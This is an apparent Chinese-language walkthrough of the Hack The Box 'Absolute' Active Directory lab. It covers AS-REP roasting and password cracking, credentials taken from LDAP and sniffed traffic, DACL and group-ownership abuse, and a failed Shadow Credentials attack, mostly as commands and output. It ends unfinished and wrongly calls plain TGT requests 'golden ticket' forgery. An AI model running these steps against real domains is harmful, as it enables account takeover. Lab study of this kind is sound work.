靶机ip:10.10.11.181

知识点

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
rustscan -a 10.10.11.181 -u 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.181:53
Open 10.10.11.181:80
Open 10.10.11.181:88
Open 10.10.11.181:135
Open 10.10.11.181:139
Open 10.10.11.181:389
Open 10.10.11.181:445
Open 10.10.11.181:464
Open 10.10.11.181:593
Open 10.10.11.181:636
Open 10.10.11.181:3268
Open 10.10.11.181:3269
Open 10.10.11.181:9389
Open 10.10.11.181:5985
Open 10.10.11.181:47001
Open 10.10.11.181:49664
Open 10.10.11.181:49665
Open 10.10.11.181:49666
Open 10.10.11.181:49667
Open 10.10.11.181:49674
Open 10.10.11.181:49671
Open 10.10.11.181:49675
Open 10.10.11.181:49679
Open 10.10.11.181:49685
Open 10.10.11.181:49703
Open 10.10.11.181:49722

SMB服务

1
2
3
4
5
6
7
8
9
smbclient -L //10.10.11.181
Password for [WORKGROUP\root]:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smb没什么有用的信息

HTTP服务

静态页面,目录扫描也没拥有的结果,将网站轮播的六张图片下载下来查看一下

1
for i in {1..6};do wget http://10.10.11.181/images/hero_$i.jpg;done

使用exiftool工具查看一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
exiftool hero_1.jpg
ExifTool Version Number : 12.76
File Name : hero_1.jpg
Directory : .
File Size : 407 kB
File Modification Date/Time : 2022:06:08 03:45:20+08:00
File Access Date/Time : 2025:03:25 03:04:05+08:00
File Inode Change Date/Time : 2025:03:25 03:03:26+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Artist : James Roberts
Y Cb Cr Positioning : Centered
Quality : 60%
XMP Toolkit : Image::ExifTool 11.88
Author : James Roberts
Creator Tool : Adobe Photoshop CC 2018 Macintosh
Derived From Document ID : 6413FD608B5C21D0939F910C0EFBBE44
Derived From Instance ID : 6413FD608B5C21D0939F910C0EFBBE44
Document ID : xmp.did:887A47FA048811EA8574B646AF4FC464
Instance ID : xmp.iid:887A47F9048811EA8574B646AF4FC464
DCT Encode Version : 100
APP14 Flags 0 : [14], Encoded with Blend=1 downsampling
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1900
Image Height : 1150
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1900x1150
Megapixels : 2.2

注意到Author字段有用户名,将每个文件的用户名都保存到name.txt文件中

正常Author和Artist是都有用户名的,这里查看第二个图片的时候发现没有Artist字段,所以改用Author

1
2
3
4
5
6
7
exiftool *.jpg | grep Author | awk -F' ' '{print $3" "$4}' > name.txt
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith

使用username-anarchy工具生成用户名字典

1
./username-anarchy -i name.txt > users.txt

AS-REP Roasting攻击

1
2
3
4
5
6
7
8
9
impacket-GetNPUsers -usersfile users.txt -dc-ip 10.10.11.181 -format john absolute.htb/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

...[snip]...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$d.klay@ABSOLUTE.HTB:18530e0c59304e8b5d667ac0cf0efa8a$ed41890599de622a5cf7808aef24c8272c03a5fb62a14b9de3f987e2f9ecc614fe22d44e7eba318ab44152271b84577844980b33e7b78ed0f9b36ebe43b4a6cc5339ecbef110e6325a4acb9d7661b4db47a609eccf7b13c53f9d1aa710a0220102bed90c8b8ee8c8319b9297d811d6c878cd9fca0e24646d82ac6c9d77b9aaf2b40ed8b9ef0c103166c3be1113daa285fca49a2dcba3dbae9d92cafeb6b7774bbd58982eaec5d712f744a281f2317b491555fcc7d58a8ed4c89d435a488b8e7df5c07d181007c5aeb3bd9c3dbb44bf896e9cdfc57509eeea3e7f76ff3d87a87cd7825e1f82e6f8724f9ba348
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...[snip]...

找到一个hash,将其保存至hash文件中,使用john爆破

1
2
3
4
5
6
7
8
9
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Darkmoonsky248girl ($krb5asrep$d.klay@ABSOLUTE.HTB)
1g 0:00:00:32 DONE (2025-03-25 03:27) 0.03097g/s 348137p/s 348137c/s 348137C/s DarrenCahppell..DarkAngelNinjaHaku
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功得到一组用户名密码

1
2
username: d.klay
password: Darkmoonsky248girl

再探SMB

使用netexec枚举

1
2
3
4
5
6
7
8
9
10
11
netexec winrm 10.10.11.181 -u d.klay -p Darkmoonsky248girl
WINRM 10.10.11.181 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:absolute.htb)
WINRM 10.10.11.181 5985 DC [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION

虽然都失败了,但是注意到smb登录的时候爆出个STATUS_ACCOUNT_RESTRICTION错误,表明该账户受到限制,尝试加上-k参数使用Kerberos认证

1
2
3
netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl

将上面失败的命令重新试一下

1
2
3
netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl

OK,成功

查看一下smb共享

1
2
3
4
5
6
7
8
9
10
11
12
netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k --shares
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
SMB 10.10.11.181 445 DC [*] Enumerated shares
SMB 10.10.11.181 445 DC Share Permissions Remark
SMB 10.10.11.181 445 DC ----- ----------- ------
SMB 10.10.11.181 445 DC ADMIN$ Remote Admin
SMB 10.10.11.181 445 DC C$ Default share
SMB 10.10.11.181 445 DC IPC$ READ Remote IPC
SMB 10.10.11.181 445 DC NETLOGON READ Logon server share
SMB 10.10.11.181 445 DC Shared
SMB 10.10.11.181 445 DC SYSVOL READ Logon server share

注意到有个Shared文件可以访问,但是需要Kerberos认证,只能寻找其他方法了

TGT黄金票据伪造

由于smb服务需要Kerberos认证,所以我们尝试一下伪造票据来访问smb

1
2
3
4
impacket-getTGT 'absolute.htb'/'d.klay':'Darkmoonsky248girl' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in d.klay.ccache

导入票据

1
export KRB5CCNAME=d.klay.ccache

先同步下时间

1
ntpdate -s absolute.htb

访问smb

1
2
3
4
5
impacket-smbclient 'absolute.htb/d.klay:Darkmoonsky248girl@dc.absolute.htb' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
#

可以访问smb,但是没有权限查看,尝试通过ldap枚举用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
netexec ldap 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k --users
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP 10.10.11.181 389 DC [*] Enumerated 17 domain users: absolute.htb
LDAP 10.10.11.181 389 DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.11.181 389 DC Administrator 2022-06-09 08:25:57 0 Built-in account for administering the computer/domain
LDAP 10.10.11.181 389 DC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.11.181 389 DC krbtgt 2022-06-09 08:16:38 0 Key Distribution Center Service Account
LDAP 10.10.11.181 389 DC J.Roberts 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC M.Chaffrey 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC D.Klay 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC s.osvald 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC j.robinson 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC n.smith 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC m.lovegod 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC l.moore 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC c.colt 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC s.johnson 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC d.lemm 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC svc_smb 2022-06-09 08:25:51 0 AbsoluteSMBService123!
LDAP 10.10.11.181 389 DC svc_audit 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC winrm_user 2022-06-09 08:25:51 2 Used to perform simple network tasks

找到一组用户名密码

1
2
username: svc_smb
password: AbsoluteSMBService123!

使用nxc验证一下

1
2
3
nxc smb 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!'
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [-] absolute.htb\svc_smb:AbsoluteSMBService123! STATUS_ACCOUNT_RESTRICTION

正常还是访问不了的,继续伪造金票

1
2
3
4
impacket-getTGT 'absolute.htb'/'svc_smb':'AbsoluteSMBService123!' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_smb.ccache

导入票据

1
export KRB5CCNAME=svc_smb.ccache

访问smb

1
2
3
4
5
impacket-smbclient 'absolute.htb'/'svc_smb':'AbsoluteSMBService123!'@'dc.absolute.htb' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
#

访问成功,直接看之前找到的Shared目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use shared
# ls
drw-rw-rw- 0 Fri Sep 2 01:02:23 2022 .
drw-rw-rw- 0 Fri Sep 2 01:02:23 2022 ..
-rw-rw-rw- 72 Fri Sep 2 01:02:23 2022 compiler.sh
-rw-rw-rw- 67584 Fri Sep 2 01:02:23 2022 test.exe
# get compiler.sh
# get test.exe
#

发现两个文件,下载到本地查看一下

看不懂的exe

1
2
3
4
cat compiler.sh
#!/bin/bash

nim c -d:mingw --app:gui --cc:gcc -d:danger -d:strip $1

.sh文件没啥有用信息,就编译了一下,重点看下exe文件

image-20250325170803915

根据这个反汇编程序+GPT得知可能是运行某种服务的程序,尝试在windows上运行并用wireshark抓包

注:一定要配置DNS,不然抓不到包

image-20250325174043354

使用wireshark监听该网卡,运行程序即可

image-20250325174144934

这就是抓到的全部报文,注意到这其中有一条保温报文显示absolute.htb\mlovegod,追踪一下tcp

image-20250325174522587

发现一组新的用户名密码,结合之前使用 ldap 枚举出的用户名,可以得到该用户名和密码

1
2
username: m.lovegod
password: AbsoluteLDAP2022!

验证一下

依旧是熟悉的伪造金票

1
2
3
4
impacket-getTGT 'absolute.htb'/'m.lovegod':'AbsoluteLDAP2022!' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in m.lovegod.ccache

导入票据(记得同步时间

1
export KRB5CCNAME=m.lovegod.ccache

nxc验证

1
2
3
4
5
6
7
nxc smb 10.10.11.181 -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!

nxc ldap 10.10.11.181 -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!

依旧登陆不了,使用bloodhound信息收集吧

bloodhound信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bloodhound-python -ns 10.10.11.181 --dns-tcp -d absolute.htb -u m.lovegod -p AbsoluteLDAP2022! -k -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: absolute.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.absolute.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250326005117_bloodhound.zip

打开bloodhound查看

m.lovegod用户为起点,点击Transitive Object Control可以得到如下信息

image-20250325184715766

m.lovegod 用户拥有 Network Audit 组,但不是其成员,该组对 winrm_user 用户上有 GenericWrite权限,并且winrm_user 用户属于REMOTE MANAGEMENT USERS组,所以我们可以通过winrm_user 用户远程登陆

image-20250325185823379

但是我们发现m.lovegod 用户属于图中的三个组并不属于Network Audit

所以我们的攻击手法就是先将m.lovegod 用户添加到Network Audit组,再通过Network Audit组对 winrm_user 用户有 GenericWrite权限,可以直接进行Shadow Credentials攻击

拿下winrm_user?

参考链接:

https://www.thehacker.recipes/ad/movement/dacl/grant-ownership

https://www.thehacker.recipes/ad/movement/dacl/grant-rights

先同步时间

1
ntpdate -s absolute.htb

m.lovegod 用户修改成 Network Audit 组的所有者

1
2
3
4
5
6
7
8
impacket-owneredit -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -new-owner m.lovegod -target 'Network Audit' -action write
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-4078382237-1492182817-2568127209-1109
[*] - sAMAccountName: m.lovegod
[*] - distinguishedName: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
[*] OwnerSid modified successfully!

使m.lovegod用户完全控制 Network Audit

1
2
3
4
5
impacket-dacledit -k 'absolute.htb/m.lovegod:AbsoluteLDAP2022!' -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250326-034031.bak
[*] DACL modified successfully!

m.lovegod自己加入到 Network Audit 组里面

1
2
bloodyAD --host dc.absolute.htb --dc-ip 10.10.11.181 -d 'absolute.htb' -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k add groupMember "Network Audit" "m.lovegod"
[+] m.lovegod added to Network Audit

加入成功,重新生成一下金票

1
2
3
impacket-getTGT 'absolute.htb'/'m.lovegod':'AbsoluteLDAP2022!' -dc-ip 10.10.11.181

export KRB5CCNAME=m.lovegod.ccache

对用户 winrm_user 执行 Shadow Credentials 攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
certipy-ad shadow auto -k -username m.lovegod@absolute.htb -p 'AbsoluteLDAP2022!' -account winrm_user -target dc.absolute.htb -dc-ip 10.10.11.181
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '22e415af-e00b-59e5-9462-693c3948067e'
[*] Adding Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': None

不出意外的话还是出意外了,请求TGT的时候出问题了

还是看下报错吧,熟悉的KDC_ERR_PADATA_TYPE_NOSUPP错误,猜测是因为机器的PKINIT过期了,所以 Shadow Credentials 攻击是不行的

待更新

试了挺多办法都失败了,先到这吧。。。